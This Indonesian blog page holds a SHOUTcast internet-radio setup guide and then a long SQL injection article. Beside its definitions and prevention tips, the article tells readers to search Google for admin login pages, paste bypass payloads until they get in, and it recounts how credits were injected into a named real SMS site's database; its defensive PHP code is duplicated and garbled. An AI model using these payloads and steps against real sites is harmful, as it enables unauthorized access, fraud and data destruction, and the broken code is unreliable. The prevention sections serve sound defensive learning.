1. Download dan Install Winamp dan Shoutcast DSP Plugin di komputer tempat kita akan mengalirkan content radio (mp3 music, dsb) ke Shoutcast Server (Listen2Myradio.Com). Download dari URL di bawah:

Winamp
Shoutcast DSP Plugin (versi Linux atau Windows)
2. Jalankan Winamp, kemudian klik kanan dan pilih “Options” -> “Preferences“.



3. Klik DSP/Effect di bagian Plug-ins dan pilih Nullsoft SHOUTcast Source DSP. Kemudian akan muncul satu window SHOUTcast Source dengan menu “Main“, “Output“, “Encoder“, “Input“.



4. Pilih “Output” dan klik “Connect” untuk konek ke Shoutcast server. Perlu dicatat, “Address”, “Port” dan “Password” harus sesuai dengan catatan setting kita di Listen2Myradio.Com. Saya sendiri mendapatkan address: 91.186.30.12, port: 16532, dan password saya set: “romi“.



5. Sekarang tinggal alirkan saja content (music, sound, dsb) ke Shoutcast Server. Caranya mudah, letakkan file mp3 di Winamp dan tekan tanda play, maka music anda akan ter-broadcast ke seluruh dunia maya.



6. Pertanyaan lain yang muncul, bagaimana kalau kita ingin mengalirkan suara kita secara live? Siapkan microphone dan masukkan kabel microphone ke soundcard PC anda. Kemudian kembali ke Winamp anda, pada SHOUTcast source, pilih “Input“, kemudian ubah “Input device” dari “Winamp (recommended)” ke “Soundcard Input“. Lalu siapkan microphone di depan mulut anda, dan ucapkan “Selamat datang di Radio Internet saya yang tercinta ini”.



CEK APAKAH RADIO KITA BERJALAN NORMAL

1. Cek dengan menjalankan browser dengan URL yang tadi kita set di Listen2Myradio.Com, misalnya saya tadi menset URL radio saya adalah http://ikc.listen2myradio.com/

2. Akan muncul tampilan seperti gambar di bawah, klik tombol play untuk mendengarkan siaran. Jujur saja di kanan kiri halaman radio kita akan banyak iklan dari Google Adsense, tapi ya itulah resiko menggunakan server gratis Tapi tidak perlu khawatir karena iklan ini tidak mengurangi fitur atau efektifitas dari server radio di Listen2MyRadio.Com



Selesai, kalau masih ada yang error, ulangi lagi tahapan instalasi seperti yang saya jelaskan diatas. Dari komentar di artikel sebelumnya, kesalahan dan error banyak terjadi karena tahapan instalasinya tidak diikuti dengan baik. Dan terakhir, selamat menjadi penyiar radio internet yang anda bangun sendiri :)
Read More

Kamis, 21 Oktober 2010


SQL injection adalah suatu teknik yang dapat dilakukan oleh cracker untuk dapat masuk kedalam system administrator tanpa mengetahui username dan password administrator terlebih dahulu dengan memanfaatkan perintah-perintah SQL yang dimasukkan kedalam database mesin server.
Akan menurut para ahli pengertian dari SQL injection adalah sebagai berikut :
      -     Menurut Rosihan Ari Yuana
SQL injection merupakan perbuatan orang yang memberikan perintah SQL untuk dijalankan di mesin server SQL tanpa sepengetahuan Anda sebagai administrator. Proses injection biasanya dilakukan orang ketika memasukkan input melalui form dengan perintah atau kode tertentu.
-          Menurut Muhammad Ilhamdi Rusydi
SQL injection adalah teknik memanipulasi perintah SQL dengan memasukkan ke database server sehingga dapat dimanfaatkan untuk mendapatkan informasi dan merubah database yang telah ada.
      -     Menurut Slamet Risnanto
SQL injection merupakan suatu teknik dengan menggunakan perintah SQL yang memungkinkan cracker dapat masuk ke dalam suatu system yang terproteksi tanpa mengetahui username dan password administrator terlebih dahulu.
-          Menurut Deris Stiawan
SQL injection adalah suatu metode yang digunakan untuk memanfaatkan kelemahan pada mesin server SQL, misalnya server menjalankan layanan SQL (MySQL, PostgraseSQL, SQL server dan lain-lain). Kemudian Craker mencoba memasukkan sesuatu script untuk mencoba menampilkan halaman error di browser dan biasanya halaman error akan menampilkan paling tidak struktur dari hierarki server SQL.

Maka dilakukan perubahan script menjadi
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit ( );
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
            while($row = mySQL_fetch_row($hasil))
{
               $Id = $row[0];
               $name = $row[1];
               $email = $row[2];
               $password = $row[3];
               $type = $row[4];      
               $block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
               echo "<script>alert('Your account has been blocked');
               document.location.href='index.php';</script>\n";
               exit ( );
            }
            $pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

      2.   MENGGUNAKAN MYSQL_ESCAPE_STRING
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh :      
$kar = “SQL injec’tion”;
                                 $filter = mySQL_escape_string($kar);
                                 echo ”Hasil filter : $filter”;






2.   SEBAB TERJADINYA
SQL injection yang dapat diartikan sebagai suatu aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dapat terjadinya karena disebabkan oleh beberapa penyebab yatu :
  1. Tidak adanya penanganan terhadap karakter – karakter tanda petik satu dan juga karakter double minus yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
  2. Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

3.   KARAKTERISTIK
SQL injection yang merupakan jenis serangan dari para hacker mempunyai beberapa karakteristik yaitu :
1.      Teknik serangan ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2.      Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database. Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.

4.   TOOLS PENDUKUNG
Untuk dapat melakukan aksi SQL injection, para hacker membutuhkan beberapa tools yang akan mereka gunakan sebagai pendukung untuk melakukan teknik penyerangan diantaranya adalah sebagai berikut :
1.      Internet Exploler / Browser
2.      PC yang terhubung internet
3.      Program atau software seperti softice
 
5.   CONTOH SINTAKS DALAM PHP
Adapun beberapa contoh sintaks agar para hacker dapat melakukan penyerangan dengan menggunakan metode SQL injection adalah sebagai berikut :
  1. $SQL = “select * from login where username = ’$username’ and password = ‘$password’”; , {dari GET atau POST variable}
  2. Isikan password dengan string ’ or ’’ = ’
  3. Hasilnya maka SQL akan seperti ini = “select   * from login where username = ’$username’ and password = ’pass’ or ‘ = ′ ”; , {dengan SQL ini hasil selection akan selalu TRUE }
  4. Dan hasilnya, para hacker bisa inject sintax SQL kedalam SQl



6.   PENANGANAN SQL INJECTION
      1.   MERUBAH SCRIPT PHP
            $query = "select id,name,email,password,type,block from user " .
            "where email = '$Email' and password = '$Password'";
            $hasil = mySQL_query($query, $id_mySQL);
            while($row = mySQL_fetch_row($hasil))
            {
               $Id = $row[0];
               $name = $row[1];
               $email = $row[2];
               $password = $row[3];
               $type = $row[4];
               $block = $row[5];
            }
if(strcmp($block, 'yes') == 0)
{
               echo "<script>alert('Your account has been blocked);
               document.location.href='index.php';</script>\n";
               exit ( );
            }
else if(!empty($Id) && !empty($name) && !empty($email) &&
!empty($password));
Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedala form email dan password maka akan terbentuk query sebagai berikut : 

3.   PEMFILTERAN KARAKTER DENGAN MEMODIFIKASI PHP.INI
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php.

Contoh :
 



Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

7.   MEMINIMALISASIKAN SQL INJECTION
Ada beberapa cara yang dapat digunakan untuk meminimalisasikan terjadinya serangan SQL injection diantaranya adalah sebagai berikut :
1.      Warning atau Error pada query tidak perlu ditampilkan. Lebih baik dibuat script yang akan langsung memfeedback log error/warning ke developer/adminnya jika terjadi kesalahan query, sementara di end-user bisa ditampilkan, misal error 404. Kalau Anda pernah / sering hosting di beberapa web hosting, pastinya ada beberapa web hosting yang memberikan penamaan yang sama untuk direktori usernya (shared hosting), misal /sompret/x2324/nama-domain (dimana sompret selalu sama untuk setiap user dalam satu mesin, x2324 adalah username, dan nama-domain adalah nama domain yang digunakan si x2324. Pesan warning dan error query yang terjadi akibat script akan menampilkan path letak file tersebut. Akan lebih parah lagi jika user memberi permission 777 ke dir / file.
2.      Developer hendaknya melakukan validasi terhadap URL dan memfilter bentuk request yang menjurus terhadap tindakan injeksi.
3.      Jangan pernah dumping database ke direktori yang tidak restrict permissionnya / publik. Dan lagi penamaan terhadap file hasil dumping database diusahakan tidak umum seperti pemberian tanggal-bulan-tahun (misal : 13071984.sql). Beberapa third party atau extension / module suatu CMS yang menggunakan konfigurasi default bisa ditebak direktori dan nama filenya.
4.      Lakukaan audit sendiri dengan berbagai macam tools yang ada.
5.      Jika dana tidak mencukupi maka tidak ada salahnya konsultasi dengan pihak yang lebih pandai tentang SQL Injection.

8.   LOKASI SQL INJECTION
Untuk dapat melakukan SQL injection pada setiap target situs tidak harus melalui inboxnya saja akan tetapi hacker bisa memasukan string-string SQL di URL situs yang telah menjadi target sebelumnya.
Misalnya ada sebuah situs www.target.com/moreinfo.cfm dengan  ProductID = 245 lalu hacker mengetikkan string injeksi debuging SQL tadi ke address bar yang dituju dibelakang url target itu, contohnya: www.target.com/moreinfo.cfm dengan ProductID = 245' having 1 = 1 dan juga hacker dapat menghapus nilai produk dari URL tersebut dan menggantinya dengan debugging code, sebagai contoh: www.target.com/moreinfo ProductID = 'having 1=1—
Setelah itu akan keluar sebuah error page dari situs itu yang memberi informasi tentang struktur database situs itu. Dari hasil informasi yang telah didapat ini, hacker dapat melakukan serangan berikutnya. Apabila browser kita adalah Internet Explorer, ada sebagian situs yang tidak menampilkan error-nya, ini dikarenakan opsi Show Friendly HTTP Error Messages diaktifkan.
Untuk itu hacker perlu menonaktifkannya dengan cara menghilangkan tanda centang di kotaknya. Opsi ini dapat anda temukan di Tools > Internet Option > Advanced cari opsinya di bagian Browsing lalu hilangkan tanda centangnya dan klik tombol Apply. Sesudah itu apabila anda menemui error page yang berisi HTTP 500 error - internal server error- sebelum men-set opsi tadi, anda cukup menekan tombol Refresh, lalu terlihatlah sudah error-nya. Setelah kita tahu struktur database-nya, dengan pengetahuan dasar dari belajar SQL kita dapat menghancurkan database itu dengan perintah ' drop database [nama_database] atau drop table [nama_table].

9.   IMPLEMENTASI SQL INJECTION
  1. Masuk ke google atau browse yg lain
  2. Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}
  1. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
  2. Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
  1. Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
    dan lain-lain.
    Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
  2. Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
  3. Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 --  ;  “ or 0=0 -- ;  or 0=0 -- ;  ‘ or 0=0 # ;
 “ or 0=0 # ;  ‘ or’x’=’x ;  “ or “x”=”x  ;  ‘) or (‘x’=’x
  1. Cobalah sampai berhasil hingga anda bisa masuk ke admin panel.

10. CONTOH SQL INJECTION SEDERHANA
Pada permasalahan ini, penulis mengajak untuk membuat contoh mengenai kasus SQL injection yang sampai saat ini dan detik ini juga masih sering kita jumpai pada situs-situs di internet. Salah satu penyalahgunaan bug SQL injection adalah digunakan untuk mem-bypass sistem login pada suatu situs. Contoh kali ini akan kita rancang sendiri sedemikian rupa mulai dari merancang database, membuat script sampai melakukan SQL injection terhadap script yang kita buat tersebut. Kita akan menggunakan MS SQL Server sebagai databasenya, ASP sebagai scripting languange nya dan sembarang HTML editor untuk membuat layar loginnya (penulis disini menggunakan MS FrontPage). Penulis asumsikan Anda menggunakan MS IIS sebagai web server. Siapkan MS IIS Anda dan juga MS SQL Server 2000 Anda.
Pertama-tama kita akan buat dahulu databasenya. Siapkan database dengan nama sqlinject dan buat tabel di dalamnya dengan nama tbUser. Berikut ini adalah struktur dari tabel tbUser melalui perintah SQL CREATE TABLE.
   Create table tbUser
   {
   username varchar(50),
   password varchar(50))
Isikan data ke dalam tabel tersebut dengan mengetikkan perintah SQL seperti berikut ini.
 insert into tbUser values('sql','inject')
Sekarang kita sudah mempunyai sebuah database yang bernama 'sqlinject', sebuah tabel yang bernama 'tbUser' dan tabel tersebut sudah diisi dengan satu buah row data. Sekarang kita akan buat sebuah halaman login yang digunakan sebagai interface web-nya. Penulis beri nama filenya yaitu login.asp.
Bentuk tampilan dari layar login ini bisa Anda lihat seperti berikut ini.
                                

Setelah itu kita buat script untuk memproses login ini, penulis beri nama login_process.asp. Code pada file login_process.asp adalah sebagai berikut. Untuk koneksi ke database (SQL Server) penulis menggunakan metode SQL Authentication, server pada localhost, username 'sa' dan password 'rahasia'.
Script untuk proses login :
<% option explicit %>
<% dim connstring,conn,recset connstring
= "Provider=SQLOLEDB.1; Password=rahasia;
Persist Security Info=True; User ID=sa; Initial Catalog=sqlinject;
ata Source=localhost"
set conn = server.createobject("adodb.connection")
set recset = server.createobject("adodb.recordset")
conn.open connstring
recset.open "select * from tbUser where username = '" &
request.form("username") & "' and password = '" &
request.form("password") & "'",conn,3,2
if not recset.eof then response.write recset.recordcount
session("username") = request.form("username")
response.redirect "secured_page.asp"
else
response.redirect "login.asp"  end if
%>
Kita lihat pada code diatas terdapat operasi SELECT ke SQL yang mencari username dan password dari tabel tbUser. Jika username dan password yang dimasukkan benar maka akan masuk ke halaman secured_page.asp (ada pada bagian akhir dari tulisan ini). Maksud dari halaman secured_page.asp ini adalah bahwa halaman tersebut hanya bisa diakses jika Anda mengisikan username dan password dengan benar. Anda tidak bisa mengetikkan URL halaman tersebut secara langsung. Gambar contoh halaman secured_page.asp bisa Anda lihat berikut ini.




Pada halaman secured_page.asp di atas terdapat sebuah link logout yang mengarah pada dokumen logout.asp. Ini digunakan untuk melakukan sign-out atau log-out dari halaman secured_page.asp dan menuju ke halaman login.asp kembali.
Code dari dokumen logout.asp adalah sebagai berikut .
  <%
   session.abandon response.redirect "login.asp"
  %>
Sekarang semua file sudah kita buat. Letakkan semua file tadi (login.asp, login_process.asp, secured_page.asp, logout.asp) dalam satu folder dan jadikan sebagai home directory pada MS IIS (web server) Anda. Hasilnya bisa Anda test dengan mengetikkan URL yang mengarah pada web Anda tadi misalnya http://localhost/login.asp.
Sekarang saatnya penulis akan menyajikan contoh SQL injection untuk mem-bypass login. Tampilkan URL yang berisi login.asp tadi (misalnya http://localhost/login.asp). Sekarang coba masukkan username 'a' dan password 'a', program akan kembali lagi ke halaman login.asp karena username dan password tersebut salah. Sekarang coba sekali lagi, kali ini username 'sql' dan password 'inject'. Karena username dan password benar maka Anda akan diarahkan ke halaman secured_page.asp. Anda bisa klik link logout jika ingin logout. Aktivitas tersebut adalah aktivitas normal pada suatu sistem pada login. Bagaimanakah cara tidak normalnya? Kita memeriksa apakah login tersebut bisa di bypass atau tidak dengan cara memberikan inputan tanda ' (single quote) pada bagian inputan username dan masukkan sembarang string pada bagian password.
Jika Anda tekan tombol submit maka akan muncul error seperti berikut ini.
      Error Type:
      Microsoft OLE DB Provider for SQL Server (0x80040E14)
      Line 1: Incorrect syntax near
'aku'. /login_process.asp, line 8
Error di atas merupakan error dari database SQL Server yang sebenarnya menyatakan ada kesalahan pada statement SQL (akibat kita masukkan karakter ' tadi). Penyebab utama kejadian di atas adalah karena karakter ' (single quote) yang kita inputkan pada bagian username. Karakter ' (single quote) merupakan karakter pemutus dari statement SQL dan dari sini bisa kita kembangkan untuk membelokkan statement SQL asli menjadi statement SQL sesuai keinginan kita. Mari kita lihat kembali kejadiannya. Misalnya kita masukkan string 'user' dan password 'pass' maka statement
SQL yang terjadi adalah sebagai berikut.
 select * from tbUser where username = 'user' and password = 'pass'
Jalankan pada MS Query Analyzer maka hasilnya akan menjadi suatu zero recordset dan tidak error. Sekarang misalnya kita memasukkan karakter ' pada username dan string 'aku' pada bagian password maka statement SQL pada database akan menjadi seperti berikut ini.
 select * from tbUser where username = ''' and password = 'aku'
      Coba jalankan pada MS Query Analyzer dan akan muncul error seperti berikut ini.
       Server: Msg 170, Level 15, State 1, Line 1
        Line 1: Incorrect syntax near 'aku'.
        Server: Msg 105, Level 15, State 1, Line 1
  Unclosed quotation mark before the character string ''.
Kita lihat error yang pertama persis sama pesannya seperti yg terjadi pada web tadi. Itu terjadi karena Anda melakukan pemotongan statement SQL dengan karakter ' dan belum Anda selesaikan. Efek dari pemotongan ini akhirnya Anda bisa menambahkan statement SQL Anda sendiri setelah karakter ' tadi. Sekarang kita selesaikan pemotongan statement SQL tadi dengan menambahkan string or 1=1. Setelah karakter ' tadi (jadi pada bagian username
Anda ketikkan ' or 1=1 sehingga sekarang statement SQL nya akan menjadi seperti berikut ini.
select * from tbUser where username = '' or 1=1 --' and password  = 'aku'
Setelah di jalankan pada MS Query Analyzer. Hasilnya adalah menimbulkan suatu record set yang menampilkan semua data pada tabel tbUser tersebut. Kita lihat lagi pada statement di atas. Karakter adalah karakter untuk menandakan bahwa string setelah tanda akan di ignore atau dianggap sebagai remark pada suatu statement SQL. Jadi sebenarnya pada statement di atas yang dijalankan adalah sebagai berikut.
      select * from tbUser where username = '' or 1=1
Jadi perintah di atas akan men-select username yang berupa blank character dan kemudian di OR dengan suatu kondisi TRUE (dalam hal ini diwakili dengan 1=1). Kondisi apapun jika di OR dengan keadaan TRUE maka hasilnya akan selalu TRUE pula. Itulah inti dari kejadian di atas.
11. CONTOH KASUS
Berikut ini merupakan teknik SQL injection yang dilakukan oleh hacker untuk menginjeksi suatu situs tertentu yang memberikan pelayanan SMS web ke sebuah handphone. Disini akan dijelaskan string dasar SQL yang dapat berubah menjadi hal yang membahayakan suatu situs.
Adapun cara yang dapat dilakukan oleh hacker tersebut adalah sebagai berikut :
1.      Mencari target dengan Google, keywordnya allinurl:.com/sendsms.asp. Inilah URL yang sering dipakai oleh web site yang menyediakan jasa mengirim SMS.
2.      Dalam contoh ini, biasanya hacker memakai www.yepcell.com, situs ini adalah sebuah situs dari Timur Tengah yang menyediakan jasa pengiriman sms ke seluruh penjuru dunia dan menyediakan aksesori handphone seperti, ringtone dan gambar.
3.      Lalu hacker harus mendaftar dulu untuk menjadi anggota supaya bisa mengirim SMS. Isikan data diri anda; semuanya boleh palsu kecuali nomor handphone. Dalam contoh ini kita buat userID dengan nama yamakasi. Tetapi sebelumnya hacker harus dapat menguji apakah situs ini memakai SQL. Cara mengujinya dapat pada input box login dengan string yang telah dibahas di atas.
4.      Setelah itu klik OK, dan account anda telah terbentuk.
5.      Proses penyerangan akan dimulai, anda masuk ke members direktory yang URL-nya adalah www.yepcell.com /members.asp lalu masukan debuging code ' having 1=1- di kolom username dan masukan sembarang password di kolom password.
6.      Lalu akan keluar error page-nya, dan dari erro page tersebut telah dijelaskan:
bahwa terdapat Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 'YepCell_membersDB.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. Lalu hacker harus tahu bahwa ada table Yepcell_membersDB dan ada field UserID, ini adalah informasi berharga. untuk itu siapa tahu ada lagi filed lainnya, jadi hacker masukan string 'GROUP BY YepCell_membersDB –
7.      Lalu muncul lagi error-nya. Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [ Microsoft ] [ ODBC SQL Server Driver ] [ SQL Server ] Column 'YepCell_membersDB.Password' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. Jika ada lagi fieldnya yaitu Password, dan hackerpun mencoba kembali untuk menginjeksi jikalau ada kemungkinan lagi field lainnya dengan 'GROUP BY YepCell_membersDB.Password, tapi jika ternyata error-nya kembali ke awal lagi, berarti ada dua field dalam satu table YepCell_membersDB.
8.      Karena sejak awal hacker melakukan SQL Injection ini untuk menambah Credits (string khusus penghitung SMS) di situs ini, maka hacker mengubah account mereka dengan injeksi ini. Perintah UPDATE adalah perintah SQl yang berguna untuk mengubah atau memperbaiki data dalam suatu field di table yang memuat field itu, dengan kode 'UPDATE [nama_table] set [field1] = [nilai1] where kondisi ; Jadi dengan info yang kita dapatkan dari error page yang tadi maka kita dapat membuat string-nya 'UPDATE YepCell_membersDB set Credits = 100 where UserID ='yamakasi' kita klik submit lalu.
9.      Jika terjadi error, hacker butuh keyakinan bahwa semua kegiatan akan selalu berjalan mulus tapi dicek terlebih dahulu account mereka.
10.  Bila sudah terlihat credits kita bertambah menjadi seratus.Artinya hacker telah sukses menginjeksi database situs itu dengan perintah SQL dasar tadi dan bukan dengan cara carding.
11.  Dan hasilnya hacker telah menginjeksi situs tersebut dan mereka bisa ber SMS ria sepuasnya. Namun kadang-kadang SMS gateway situs ini sering down.

12. CARA PENCEGAHAN
  1. Membatasi panjang dari suatu input box (jika memungkinkan), dengan
    cara membatasinya di kode program, jadi si hacker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
  2. Memfilterisasi input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
  3. Mematikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
  4. Mematikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
  5. Mengubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
Read More
 
Design By : aby